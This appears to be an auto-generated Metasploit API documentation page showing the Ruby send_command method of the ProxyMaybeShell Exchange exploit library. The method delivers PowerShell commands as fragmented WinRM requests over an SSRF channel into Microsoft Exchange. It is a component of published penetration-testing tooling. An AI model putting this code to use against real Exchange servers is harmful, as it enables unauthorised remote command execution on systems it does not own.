Module: Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell::SSRFWinRMConnection::PowerShell

Defined in:
lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb

Instance Method Summary collapse

Instance Method Details

#send_command(command, _arguments) ⇒ Object



177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
# File 'lib/msf/core/exploit/remote/http/exchange/proxy_maybe_shell.rb', line 177

def send_command(command, _arguments)
  command_id = SecureRandom.uuid.to_s.upcase
  message = MessageFactory.create_pipeline_message(@runspace_id, command_id, command)
  fragmenter.fragment(message) do |fragment|
    command_args = [connection_opts, shell_id, command_id, fragment]
    if fragment.start_fragment
      resp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build)
      command_id = REXML::XPath.first(resp_doc, "//*[local-name() = 'CommandId']").text
    else
      transport.send_request(WinRM::WSMV::SendData.new(*command_args).build)
    end
  end

  command_id
end